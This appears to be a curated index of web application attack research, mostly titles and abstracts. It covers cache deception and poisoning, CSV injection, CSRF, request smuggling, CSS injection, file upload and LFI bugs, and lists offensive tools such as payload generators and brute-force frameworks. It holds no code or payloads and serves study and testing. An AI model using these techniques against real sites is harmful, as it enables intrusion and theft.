- Cached and Confused: Web Cache Deception in the Wild - Seyed Ali Mirheidari, Sajjad "JJ" Arshad(h@ckivitycon 2020)
- Web Cache Deception (WCD) was introduced in 2017 by Omer Gil, where an intruder lures a caching server to mistakenly store private information publicly and as a result obtains unauthorized access to cached data. In this talk, we will introduce new exploitation techniques based on the semantic disconnect among different framework-independent web technologies (e.g., browsers, CDNs, web servers) which results in different URL path interpretations. We coined the term “Path Confusion” to represent this disagreement and we will present the effectiveness of this technique on the WCD attack. In February 2020, our related research was voted and led to an award as the top web hacking technique of 2019 by PortSwigger. We explore WCD as an instance of the path confusion class of attacks, and demonstrate that variations on the path confusion technique make it possible to exploit sites that are otherwise not impacted by the original attack. Our findings show that many popular sites remain vulnerable three years after the public disclosure of WCD. To further elucidate the seriousness of path confusion, we will also present the large scale analysis results of the WCD attack on high profile sites. We present a semi-automated path confusion crawler which detects hundreds of sites that are still vulnerable to WCD only with specific types of path confusion techniques. We conclude the talk by explaining why path confusion is so complicated to remediate while shedding light on potential areas where researchers and bughunters can apply new attack vectors through different path confusion techniques.
- Writeups
- Tools
- Web Cache Deception Burp Extension
- A Burp extension to test applications for vulnerability to the Web Cache Deception attack.
- Web Cache Poisoning Attack
- 101
- HTTP Cache Poisoning via Host Header Injection - Carlos Bueno(2007)
- Web Cache Poisoning - 0xn3va
- Web cache poisoning - PortSwigger
- Practical Web Cache Poisoning: Redefining 'Unexploitable' - James Kettle(BHUSA2018)
- Slides
- Modern web applications are composed from a crude patchwork of caches and content delivery networks. In this session I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone that makes the mistake of visiting their homepage.
- Articles/Blogposts/Writeups
- Practical Web Cache Poisoning - James Kettle(2018/20)
- Bypassing Web Cache Poisoning Countermeasures - James Kettle(2018/20)
- Responsible denial of service with web cache poisoning - James Kettle(2019)
- CPDoS: Cache Poisoned Denial of Service
- Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle(2020)
- Web Cache Poisoning for Beginners(2020)
- Cache Poisoning at Scale - Youstin(2021)
- Talks/Presentations/Videos
- Tools
- Param-miner
- This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
- 101
- See section of same name under the 'Privesc/PostEx - General' page.
- 101
- [Cell Injection] Attacking the end user through the application - David Stubley(2013)
- Comma Separated Vulnerabilities - James Kettle(2014)
- This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.
- CSV injection: Basic to Exploit!!!! - Akansha Kesharwani(2017)
- Articles/Blogposts/Writeups
- From CSV to Meterpreter - XPNSec(2015)
- CSV Injection Revisited - Making Things More Dangerous(and fun) - Andy Gill(2016)
- The Absurdly Underestimated Dangers of CSV Injection - George Mauer(2017)
- CSV Injection- There's devil in the detail - Sunil Joshi(2017)
- Microsoft Excel CSV code execution/injection method - xor %eax,%eax(2017)
- From CSV to CMD to qwerty - exploresecurity(2019)
- Data Extraction to Command Execution CSV Injection - Jamie Rougvie(2019)
- CSV Injection Payload List - Ismail Tasdelen(2020)
- Everything about the CSV Excel Macro Injection - Ishaq Mohammed(2021)
- Talks & Presentations
- Tricks to improve web app excel export attacks(Slides) - Jerome Smith - CamSec2016
- Video
- This presentation is an embellished version of the second half of a talk originally presented at BSides MCR 2016. It covers more general web app export issues as well as revisions on the DDE content following feedback from BSides. This talk also had more demos.
- Tools
- 101
- Clickjacking - Wikipedia
- Clickjacking (classified as a User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages.
- Clickjacking Defense Cheat Sheet - OWASP
- This cheat sheet is intended to provide guidance for developers on how to defend against Clickjacking, also known as UI redress attacks.
- X-Frame-Options - MDN Web Docs
- Clickjacking (UI redressing) - PortSwigger
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- Clickjacking Attacks and How to Prevent Them - Andrea Chiarelli(2020)
- A Tale of Two Headers: A Formal Analysis of Inconsistent Click-Jacking Protection on the Web - Stefano Calzavara, Sebastian Roth, Alvise Rabitti, Michael Backes, Ben Stock(2020)
- Click-jacking protection on the modern Web is commonly enforced via client-side security mechanisms for framing control, like the X-Frame-Options header (XFO) and Content Security Policy (CSP). Though these client-side security mechanisms are certainly useful and successful, delegating protection to web browsers opens room for inconsistencies in the security guarantees offered to users of different browsers. In particular, inconsistencies might arise due to the lack of support for CSP and the different implementations of the underspecified XFO header. In this paper, we formally study the problem of inconsistencies in framing control policies across different browsers and we implement an automated policy analyzer based on our theory, which we use to assess the state of click-jacking protection on the Web. Our analysis shows that 10% of the (distinct) framing control policies in the wild are inconsistent and most often do not provide any level of protection to at least one browser. We thus propose recommendations for web developers and browser vendors to mitigate this issue. Finally, we design and implement a server-side proxy to retrofit security in web applications.
- Papers
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- HTML Form Protocol Attack - Jochen Topf(2001)
- This paper describes how some HTML browsers can be tricked through the use of HTML forms into sending more or less arbitrary data to any TCP port. This can be used to send commands to servers using ASCII based protocols like SMTP, NNTP, POP3, IMAP, IRC, and others. By sending HTML email to unsuspecting users or using a trojan HTML page, an attacker might be able to send mail or post Usenet News through servers normally not accessible to him. In special cases an attacker might be able to do other harm, e.g. deleting mail from a POP3 mailbox.
- Cross-Protocol Request Forgery - Tanner Prynn(2018)
- Server-Side Request Forgery (SSRF) and Cross-Site Request Forgery (CSRF) are two attack methods that enable attackers to cross network boundaries in order to attack applications, but can only target applications that speak HTTP. Custom TCP protocols are everywhere: IoT devices, smartphones, databases, development software, internal web applications, and more. Often, these applications assume that no security is necessary because they are only accessible over the local network. This paper aims to be a definitive overview of attacks that allow cross-protocol exploitation of non-HTTP listeners using CSRF and SSRF, and also expands on the state of the art in these types of attacks to target length-specified protocols that were not previously thought to be exploitable.
- Presentations/Talks/Videos
- Tools
- Extract data
- Extract data is a demo combining a cross-protocol request attack with DNS rebinding
- 101
- Articles/Blogposts/Writeups
- Content-Type Blues - Neil Bergman
- Exploiting CVE-2011-2461 on google.com - Mauro Gentile
- Cross-Site Content (Data) Hijacking (XSCH) PoC Project
- Even uploading a JPG file can lead to Cross-Site Content Hijacking (client-side attack)! - Soroush Dalili
- Same Origin Policy Weaknesses - Kuza55
- The lesser known pitfalls of allowing file uploads on your website - Mathias Karlsson, Frans Rosén
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts
- ClientSideTrojan - zope.org(2000)
- [Cross-Site Request Forgeries - Peter Watkins(Bugtraq 2002)](https://web.archive.org/web/20020204142607/http://www.tux.org/~peterw/csrf.txt)
- Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
- The OWASP Top Ten and ESAPI – Part 5 – Cross Site Request Forgery (CSRF)
- [Testing for CSRF (OTG-SESS-005) - OWASP](https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005))
- JavaScript Hijacking - Brian Chess, Yekaterina Tsipenyuk O'Neil, Jacob West(2007)
- A most Neglected Fact About CSRF - pdf
- Bypassing CSRF Protection - Vickie Li
- Samesite by Default and What It Means for Bug Bounty Hunters - Filedescriptor, Ron Chan & Edoverflow(2020)
- Cross Site Request Forgery: Techniques - OneHackMan(2019)
- CSRF is dead - Scott Helme(2017)
- CSRF is (really) dead - Scott Helme(2019)
- Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation - Billy K Rios, Raghav Dube(BHEU 2007)
- JSON CSRF with Parameter Padding - Gursev Kalra
- Cross-Site Request Forgery (CSRF) | Complete Guide - Rana Khalil(2021)
- In this video, we cover the theory behind Cross-Site Request Forgery (CSRF) vulnerabilities, how to find these types of vulnerabilities from both a white box and black box perspective, how to exploit them and how to prevent them.
- CSRF in YouTube Leanback API - xdavidhu(2021)
- The State of CSRF Vulnerability in 2022 - Utku Sen(2022)
- XSRFProbe
- The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.
- Writeups
- WordPress 5.1 CSRF to Remote Code Execution - Simon Scannell(2019)
- CSRF to RCE bug chain in Prestashop v1.7.6.4 and below - Sivanesh Ashok(2020)
- CSRF Protection Bypass in Play Framework - Luca Carrettoni(2020)
- Research: The mass CSRFing of .google.com/ products. - missoumsai.com
- Zoom Security Exploit – Cracking private meeting passwords - Tom Anthony(2020)
- Setting the ‘Referer’ Header Using JavaScript - Drew Kirkpatrick(2020)
- How I leveraged an interesting CSRF vulnerability to turn self XSS into a persistent attack? - Akash Methani(2020)
- Exploiting WebSocket [Application Wide XSS / CSRF] - Osama Avvan
- CSRF is No Joke: From CSRF to RCE in Cisco Energy Management - Chris Lyne
- From Csrf To Rce - fgsec.net(2020)
- From CSRF to RCE and WordPress-site takeover: CVE-2020-8417 - Jonas Lejon
- WordPress 5.1 CSRF + XSS + RCE – Poc - Pablo Plaza Martinez
- Bolt CMS <= 3.7.0 Multiple Vulnerabilities - CSRF to RCE - Sivanesh Ashok
- Playing with GZIP: RCE in GLPI (CVE-2020-11060) - @myst404
- Papers
- [Session Riding: A Widespread Vulnerability in Today's Web Applications - Thomas Schreiber(2004)](https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf)
- Robust Defenses for Cross-Site Request Forgery
- RequestRodeo: Client Side Protection against Session Riding - Martin Johns and Justus Winter - pdf
- Presentations/Talks/Videos
- Tools
- Onsite-Request-Forgery
- 101
- General
- Articles/Blogposts/Writeups
- I know where you've been - Jeremiah Grossman(2006)
- CSS based Attack: Abusing unicode-range of @font-face - Masato Kinugawa(2015)
- CSS: Cascading Style Scripting - XSS Jigsaw(2015)
- History theft with CSS Boolean algebra - lcamtuf
- CSS mix-blend-mode is bad for your browsing history - lcamtuf(2016)
- Stealing Data With CSS: Attack and Defense - Mike Gualtieri(2018)
- Third party CSS is not safe - Jake Archibald(2018)
- CSS Security Vulnerabilities - Chris Coyier(2019)
- Cross-Origin CSS Attacks Revisited (feat. UTF-16) - @filedescriptor
- Talks/Presentations/Videos
- The Sexy Assassin: Tactical Exploitation Using CSS - G. Heyes, D. Lindsay, and E.V. Nava(BlueHat 2009)
- XSS. (No, the other "S") - Mike West(CSSconf.eu 2013)
- Attacking Rich Internet Applications - Stefano Di Paola, kuza55(25c3 2010)
- This presentation will examine the largely under-researched topic of rich internet applications (RIAs) security in the hopes of illustrating how the complex interactions with their executing environment, and general bad security practices, can lead to exploitable applications. In recent years rich internet applications (RIAs) have become the mainstay of large internet applications and are becoming increasingly attractive to the industry due to their similarity to desktop applications. Furthermore their use of existing web technologies such as HTTP, HTML/XML and Javascript/Actionscript make them attractive options to companies with existing web developers. Unfortunately the use of existing technologies brings with it the burden of existing ways to write vulnerable code, but adds yet more ways. This presentation will examine the largely under-researched topic of RIA security in the hopes of illustrating how the complex interactions with their executing environment, and general bad security practices, can lead to exploitable applications.
- The Curse of Cross-Origin Stylesheets - LiveOverflow(2018)
- The Sexy Assassin Tactical Exploitation using CSS. - Gerardo Speaks
- Papers
- Scriptless Attacks - Stealing the Pie Without Touching the Sill - Mario Heiderich, Marcus Niemietz, Felix Schuster, Thorsten Holz, Jörg Schwenk(2012)
- In this paper, we examine the attack surface that remains after XSS and similar scripting attacks are supposedly mitigated by preventing an attacker from executing JavaScript code. We address the question of whether an attacker really needs JavaScript or similar functionality to perform attacks aiming for information theft. The surprising result is that an attacker can also abuse Cascading Style Sheets (CSS) in combination with other Web techniques like plain HTML, inactive SVG images or font files. Through several case studies, we introduce the so called scriptless attacks and demonstrate that an adversary might not need to execute code to preserve his ability to extract sensitive information from well protected websites. More precisely, we show that an attacker can use seemingly benign features to build side channel attacks that measure and exfiltrate almost arbitrary data displayed on a given website. We conclude this paper with a discussion of potential mitigation techniques against this class of attacks. In addition, we have implemented a browser patch that enables a website to make a vital determination as to being loaded in a detached view or pop-up window. This approach proves useful for prevention of certain types of attacks we here discuss.
- Tools
- Articles/Blogposts/Writeups
- CSS Injection
- 101
- Articles/Blogposts/Writeups
- Stealing Secrets with CSS : Cross Origin CSS Attacks - Keith Makan(2016)
- Better Exfiltration via HTML Injection - d0nut(2019)
- CSS Injection Primitives - x-c3ll
- CSS data exfiltration in Firefox via a single injection point - Michal Bentkowski(2020)
- Unleashing the power of CSS injection: The access key to an internal API(2023)
- "In this write-up, we will be explaining a vulnerability that was discovered in an online accounting application. The vulnerability was a CSS injection flaw that could be exploited in the application’s PDF generator. We will explain to you how we discovered the vulnerability and how we were able to exploit it to get internal API access."
- Cross-origin pixel stealing: Timing attacks using CSS filters - Robert Kotcher, Yutong Pei, Pranjal Jumde, Collin Jackson
- Presentations/Talks/Videos
- Tools
- sic
- A tool to perform Sequential Import Chaining
- 101
- Articles/Blogposts/Presentations/Talks/Videos
- Security Testing HTML5 WebSockets - ethicalhack3r(2013)
- How Cross-Site WebSocket Hijacking could lead to full Session Compromise - notsosecure.com(2014)
- Analysing, Testing and Fuzzing WebSocket Implementations with IronWASP - ironwasp.org(2014)
- Cross-Site Websocket Hijacking (CSWSH) - Jesse Somerville(2019)
- Hacking WebSocket With Cross-Site WebSocket Hijacking attacks - Vickie Li(2019)
- Cross-site WebSocket hijacking (CSWSH) - HackTricks
- Talks/Presentations/Videos
- Papers
- Tools
- --> See XML section
- --> See 'CSV Injection' Attack
- Comma Separated Vulnerabilities
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Cache Me If You Can - Philippe Arteau
- Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking - Louis Dion-Marcil(BHUSA2018)
- Slides
- When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- APIs
- See api section
- HTTP
- httpfuzz
- httpfuzz is a fast HTTP fuzzer written in Go inspired by Burp Intruder. It takes a seed request and uses a wordlist to generate requests. For a wordlist with m words and a seed request with n injection points, httpfuzz will generate m * n requests. It can be used as a library, but is meant to be used with the included httpfuzz CLI. It allows fuzzing of HTTP requests with text bodies and multipart file uploads.
- Injection Vulns
- Papers
- Toss a Fault to Your Witcher: Applying Grey-box Coverage-Guided Mutational Fuzzing to Detect SQL and Command Injection Vulnerabilities - Erik Trickel, Fabio Pagani, Chang Zhu, Lukas Dresel, Giovanni Vigna, Christopher Kruegel, Ruoyu Wang, Tiffany Bao, Yan Shoshitaishvili, Adam Doupé(2022)
- To overcome these limitations, we propose Witcher, a novel web vulnerability discovery framework that is inspired by grey-box coverage-guided fuzzing. Witcher implements the concept of fault escalation to detect both SQL and command injection vulnerabilities. Additionally, Witcher captures coverage information and creates output-derived input guidance to focus the input generation and, therefore, to increase the state-space exploration of the web application. On a dataset of 18 web applications written in PHP, Python, Node.js, Java, Ruby, and C, 13 of which had known vulnerabilities, Witcher was able to find 23 of the 36 known vulnerabilities (64%), and additionally found 67 previously unknown vulnerabilities, 4 of which received CVE numbers. In our experiments, Witcher outperformed state of the art scanners both in terms of number of vulnerabilities found, but also in terms of coverage of web applications.
- Papers
- JSON
- Articles/Blogposts/Writeups
- Tools
- Regex
- Articles/Blogposts/Writeups
- REcollapse
- Blogpost
- REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications
- Talks/Presentations
- ReDoSHunter: A Combined Static and Dynamic Approach for Regular Expression DoS Detection - Yeting Li and Zixuan Chen, Jialun Cao, Zhiwu Xu, Qiancheng Peng, Haiming Chen, Liyuan Chen, Shing-Chi Cheung(Usenix2021)
- Tool
- To address these two problems, we propose ReDoSHunter, a ReDoS-vulnerable regex detection framework that can effectively pinpoint the multiple vulnerabilities in a vulnerable regex, and generate examples of attack-triggering strings. ReDoSHunter is driven by five vulnerability patterns derived from massive vulnerable regexes. Besides pinpointing vulnerabilities, ReDoSHunter can assess the degree (i.e., exponential or polynomial) of the vulnerabilities detected. Our experiment results show that ReDoSHunter achieves 100% precision and 100% recall in the detection of ReDoS-vulnerable regexes in three large-scale datasets with 37,651 regexes. It significantly outperforms seven state-of-the-art techniques. ReDoSHunter uncovered 28 new ReDoS-vulnerabilities in 26 well-maintained popular projects, resulting in 26 assigned CVEs and 2 fixes.
- Tools
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Homograph Attack - crypto-it.net
- What is an IDN Homograph Attack and How Do You Protect Yourself? - zvelo(2018)
- Phishing with Unicode Domains - Xudong Zheng(2017)
- Watch Your Step: The Prevalence of IDN Homograph Attacks - Asaf Nadler(2017)
- Homograph attacks: Don’t believe everything you see - Cecilia Pastorino(2017)
- A Quick Guide to the IDN Homograph Attack - Ronnie T. Baby
- Talks/Presentations/Videos
- Weaponizing Unicode Homographs Beyond IDNs - The Tarquin(DEFCON 26)
- Most people are familiar with homograph attacks due to phishing or other attack campaigns using Internationalized Domain Names with look-alike characters. But homograph attacks exist against a wide variety of systems that have gotten far less attention. This talk discusses the use of homographs to attack machine learning systems, to submit malicious software patches, and to craft cryptographic canary traps and leak repudiation mechanisms. It then introduces a generalized defense strategy that should work against homograph attacks in any context.
- Papers
- Cutting through the Confusion: A Measurement Study of Homograph Attacks. - Tobias Holgers, David E. Watson, Steven D. Gribble(2006)
- Web homograph attacks have existed for some time, and the recent adoption of International Domain Names (IDNs) support by browsers and DNS registrars has exacerbated the problem [Gabr02]. Many international letters have similar glyphs, such as the Cyrillic letter P (lower case 'er,' Unicode 0x0440) and the Latin letter p. Because of the large potential for misuse of IDNs, browser vendors, policy advocates, and researchers have been exploring techniques for mitigating homograph attacks [Mozi05, Appl05, Oper05, Mark05]. There has been plenty of attention on the problem recently, but we are not aware of any data that quantifies the degree to which Web homograph attacks are currently taking place. In this paper, we use a combination of passive network tracing and active DNS probing to measure several aspects of Web homographs. Our main findings are four-fold. First, many authoritative Web sites that users visit have several confusable domain names registered. Popular Web sites are much more likely to have such confusable domains registered. Second, registered confusable domain names tend to consist of single character substitutions from their authoritative domains, though we saw instances of five-character substitutions. Most confusables currently use Latin character homographs, but we did find a non-trivial number of IDN homographs. Third, Web sites associated with non-authoritative confusable domains most commonly show users advertisements. Less common functions include redirecting victims to competitor sites and spoofing the content of the authoritative site. Fourth, during our nine-day trace, none of the 828 Web clients we observed visited a non-authoritative confusable Web site. Overall, our measurement results suggest that homograph attacks currently are rare and not severe in nature. However, given the recent increases in phishing incidents, homograph attacks seem like an attractive future method for attackers to lure users to spoofed sites.
- Іntеrnɑtⅰonɑlⅰzеⅾ Dоmɑⅰn Nɑmе Hоmоɡrɑρh Attɑсκ - Chen Lai, Zhongrong Jian, J. Sidrach
- ShamFinder: An Automated Framework for Detecting IDN Homographs - Hiroaki Suzuki, Daiki Chiba, Yoshiro Yoneya, Tatsuya Mori, Shigeki Goto
- Tools
- EvilURL v2.0
- Generate unicode evil domains for IDN Homograph Attack and detect them.
- homoglyphs.net
- Punycode converter
- or an IDN converter, a tool for Punycode to Text/Unicode and vice-versa conversion
- 101
- Articles/Blogposts/Writeups
- Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP
- Insecure Direct Object Reference Prevention Cheat Sheet - OWASP
- Airbnb – Web to App Phone Notification IDOR to view Everyone’s Airbnb Messages - Brett Buerhaus
- How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - BugCrowd
- A Less Known Attack Vector, Second Order IDOR Attacks - Ozgur Alp(2020)
- Automated IDOR Discovery through Stateful Swagger Fuzzing - Aaron Loo(2020)
- Finding more IDORs – Tips and Tricks - Max Corbridge(2021)
- Talks/Presentations/Videos
- Tools
- Execution After Redirect
- Open Redirect
- 101
- Articles/Blogposts/Writeups
- Why File Upload Forms are a Major Security Threat - acunetix
- Unrestricted File Upload Testing
- BookFresh Tricky File Upload Bypass to RCE - secgeek.net
- Ability to upload HTML via SRT caption files for Facebook Videos - philippeharewood.com(2015)
- 15 Technique to Exploit File Upload Pages - Ebrahim Hegazy(HackIT17)
- File Upload and PHP on IIS: '>' = '?', '<' = '*' and '"' = '.' - Soroush Dalili
- Exploiting File Uploads Pt. 1 – MIME Sniffing to Stored XSS #bugbounty - HackerOnTwoWheels(2019)
- Bypassing file upload filter by source code review in Bolt CMS - Sivanesh Ashok
- File Upload Testing tips - HolyBugx
- File upload tricks and checklist - Gus Ralph(2021)
- A New Vector For “Dirty” Arbitrary File Write to RCE - Maxence Schmitt, Lorenzo Stella(2023)
- Papers
- Presentations/Talks/Videos
- FUSE: Finding File Upload Bugs via Penetration Testing - Taekjin Lee, Seongil Wi, Suyoung Lee, Sooel Son(NDSS2020)
- An Unrestricted File Upload (UFU) vulnerability is a critical security threat that enables an adversary to upload her choice of a forged file to a target web server. This bug evolves into an Unrestricted Executable File Upload (UEFU) vulnerability when the adversary is able to conduct remote code execution of the uploaded file via triggering its URL. We design and implement FUSE, the first penetration testing tool designed to discover UFU and UEFU vulnerabilities in server-side PHP web applications. The goal of FUSE is to generate upload requests; each request becomes an exploit payload that triggers a UFU or UEFU vulnerability. However, this approach entails two technical challenges: (1) it should generate an upload request that bypasses all content-filtering checks present in a target web application; and (2) it should preserve the execution semantic of the resulting uploaded file. We address these technical challenges by mutating standard upload requests with carefully designed mutation operations that enable the bypassing of content- filtering checks and do not tamper with the execution of uploaded files. FUSE discovered 30 previously unreported UEFU vulnerabilities, including 15 CVEs from 33 real-world web applications, thereby demonstrating its efficacy in finding code execution bugs via file uploads.
- Paper
- Tools
- Anti Malware Testfile - EICAR
- fuxploider
- File upload vulnerability scanner and exploitation tool.
- 101
- Articles/Blogposts/Writeups
- Tools
- 101
- HTTP request smuggling - Wikipedia
- HTTP request smuggling is a security exploit on the HTTP protocol that uses inconsistency between the interpretation of Content-length and/or Transfer-encoding headers between HTTP server implementations in an HTTP proxy server chain. It was first documented in 2005, and was again repopularized by PortSwigger's research.
- HTTP request smuggling - Portswigger
- HTTP Desync Attacks: Request Smuggling Reborn - James Kettle
- ‘HTTP Request Smuggling’ - Securiteam
- Help you understand HTTP Smuggling in one article - @ZeddYu_Lu
- Request Smuggling 101 - Philippe Arteau(2021)
- Articles/Blogposts/Writeups
- Checking HTTP Smuggling issues in 2015 - Part1 - RBleug(2015)
- Hiding in plain sight: HTTP request smuggling - Travis Isaacson(2020)
- Demystifying HTTP request smuggling - Sam Sanoop
- NGINX error_page request smuggling - Bert JW Regeer, Francisco Oca Gonzalez(2019)
- HTTP Request Smuggling + IDOR - hipotermia(2019)
- The Powerful HTTP Request Smuggling 💪 - Ricardo Iramar dos Santos
- "TL;DR: This is how I was able to exploit a HTTP Request Smuggling in some Mobile Device Management (MDM) servers and send any MDM command to any device enrolled on them for a private bug bounty program."
- h2c Smuggling: Request Smuggling Via HTTP/2 Cleartext (h2c) - Jake Miller(2020)
- HTTP Request Smuggling – 5 Practical Tips - Pieter Hiele(2020)
- XXE-scape through the front door: circumventing the firewall with HTTP request smuggling - Pieter Hiele(2020)
- Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond - Daniel Thatcher(2020)
- Account takeover via HTTP Request Smuggling - hipotermia(2020)
- HTTP Request Smuggling Workshop - Philippe Arteau
- HTTP Request Smuggling via higher HTTP versions - Emil Lerner(2021)
- Performing
- A Pentester’s Guide to HTTP Request Smuggling - Bursa Demir(2020)
- Smuggling HTTP headers through reverse proxies - Robin Verton(2020)
- HTTP Request Smuggling: Abusing Reverse Proxies - Christopher Elgee(2020)
- WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour - Soroush Dalili(2018)
- Papers
- Presentations/Talks/Videos
- HTTP Desync Attacks: Smashing into the Cell Next Door - James Kettle(DEFCON27)
- HTTP requests are traditionally viewed as isolated, standalone entities. In this session, I'll introduce techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $50k in bug bounties. Using these targets as case studies, I’ll show you how to delicately amend victim's requests to route them into malicious territory, invoke harmful responses, and lure credentials into your open arms. I’ll also demonstrate using backend reassembly on your own requests to exploit every modicum of trust placed on the frontend, gain maximum privilege access to internal APIs, poison web caches, and compromise my favourite login page. Although documented over a decade ago, a fearsome reputation for difficulty and collateral damage has left this attack optimistically ignored for years while the web's susceptibility grew. By applying fresh ideas and new techniques, I’ll unveil a vast expanse of vulnerable systems ranging from huge content delivery networks to bespoke backends, and ensure you leave equipped to devise your own desync techniques and tailor attacks to your target of choice.
- Hiding Wookiees in HTTP: HTTP smuggling - regilero(Defcon24)
- HTTP is everywhere, everybody wants to write an HTTP server. So I wrote mine :-) But mine is not fast, and comes with an HTTP client which sends very bad HTTP queries. My tool is a stress tester for HTTP servers and proxies, and I wrote it because I found flaws in all HTTP agents that I have checked in the last year, i.e. nodejs, golang, Apache httpd, FreeBSD http, Nginx, Varnish and even Haproxy. This presentation will try to explain how flaws in HTTP parsers can be exploited for bad things; we'll play with HTTP to inject unexpected content in the user browser, or perform actions in his name. If you know nothing about HTTP it should be understandable, but you'll have to trust me blindly at the end. If you think you know HTTP, you have no reason to avoid this talk. Then, the short part, I will show you this new Open Source stress tool that I wrote and hope that you will remember it when you'll write your own HTTP parser for your new f** language.
- Practical Attacks Using HTTP Request Smuggling - @defparam(NahamCon2020)
- HTTP Request Smuggling in 2020 – New Variants, New Defenses and New Challenges - Amit Klein(BHUSA2020)
- HTTP Request Smuggling (AKA HTTP Desyncing) is an attack technique invented in 2005 that exploits different interpretations of a stream of non-standard HTTP requests among various HTTP devices between the client (attacker) and the server (including the server itself). It can be used to smuggle requests across WAFs and security solutions, poison HTTP caches, inject responses to users and hijack user requests.
- HTTP Desync Attack Explained With Paper - LiveUnderflow(2021)
- Tools
- Smuggler
- An HTTP Request Smuggling / Desync testing tool written in Python 3
- HTTPWookie
- HTTPWookiee is an HTTP server and proxy stress tool (respect of RFC, HTTP Smuggling issues, etc). If you run an HTTP server project contact me for private repository access with more tests.
- smuggler.py
- 101
- Articles/Blogposts/Writeups
- Revisiting XSS payloads in PNG IDAT chunks - Adam Logue
- An XSS on Facebook via PNGs & Wonky Content Types - jack@whitton.io
- Encoding Web Shells in PNG IDAT chunks - idontplaydarts
- Bypassing CSP using polyglot JPEGs - Gareth Heyes
- Hacking group using Polyglot images to hide malvertising attacks - Josh Summit
- BMP/x86 Polyglot - steiner@warroom.securestate
- Upload a web.config File for Fun & Profit - Soroush Dalili
- Uploading web.config for Fun and Profit 2 - Soroush Dalili
- Encoding Web Shells in PNG IDAT chunks - phil
- Tools
- xss2png
- A simple tool to generate PNG images with XSS payloads stored in PNG IDAT chunks
- pixload
- Set of tools for creating/injecting payload into images.
- PNG-IDAT-Payload-Generator
- Generate a PNG with a payload embedded in the IDAT chunk (Based off of previous concepts and code -- credit in README)
- Imagecreatefromgif-Bypass
- 101
- Articles/Blogposts/Writeups
- Command Injection
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations
- Tools
- Resources
- JSON(P) Injection
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Web PenTesting Workshop Part 12 of 12 JSON injection - Jeremy Druin
- Video from the ISSA Kentuckiana Web Pen-Testing Workshop.
- Tools
- Resources
- LDAP Injection
- OGNL Injection
- Papers
- Presentations/Talks/Videos
- Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong - AppSecUSA 2017
- Remote Code Execution in Firefox beyond memory corruptions(2019) - Frederik Braun
- Browsers are complicated enough to have attack surface beyond memory safety issues. This talk will look into injection flaws in the user interface of Mozilla Firefox, which is implemented in JS, HTML, and an XML-dialect called XUL. With a Cross-Site Scripting (XSS) in the user interface attackers can execute arbitrary code in the context of the main browser application process. This allows for cross-platform exploits of high reliability. The talk discusses past vulnerabilities and will also suggest mitigations that benefit Single Page Applications and other platforms that may suffer from DOM-based XSS, like Electron.
- Tools
- See also: JNDI, JSON, SQLi, XSS
- General
- Testing
- Tools
- Writeups
- General
- Testing
- jndipoc
- Proof of concept showing how Java bytecode can be injected through InitialContext.lookup() calls
- Tools
- Writeups
- 101
- Articles/Papers/Writeups
- Tools
- BruteLoops
- A dead simple library providing the foundational logic for efficient password brute force attacks against authentication interfaces.
- Big Friggin Gun (BFG)
- BFG is a simple modular framework to perform brute-force attacks. It uses the BruteLoops library for the brute force and database management logic.
- 101
- Articles/Papers/Writeups
- 101
- Articles/Papers/Writeups
- LFI with PHPINFO() Assistance - InsomniaSecurity 2011
- Turning LFI into RFI
- When configured in a specific way, the web application would load the JAR file and search within the file for a class. Interestingly enough, in Java classes you can define a static block that is executed upon the class being processed.
- Unrestricted File Upload Security Testing - Aptive
- Local file inclusion tricks - Johan Adriaans(2007)
- Upgrade from LFI to RCE via PHP Sessions - (2017)
- CVV #1: Local File Inclusion - SI9INT
- File Inclusion - nets.ec(2016)
- SMTP Log Poisoning through LFI to Remote Code Execution - Aarti Singh(2019)
- PHP Autoloading: Local File Inclusion by Design - Stephen Shkardoon(2019)
- Practical strategies for exploiting FILE READ vulnerabilities - AFINE(2021)
- Papers
- LFI2RCE (Local File Inclusion to Remote Code Execution) advanced exploitation: /proc shortcuts
- This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities.
- Cheat Sheets/Reference Lists
- Testing
- OWASP LFI
- LFI Local File Inclusion Techniques (paper)
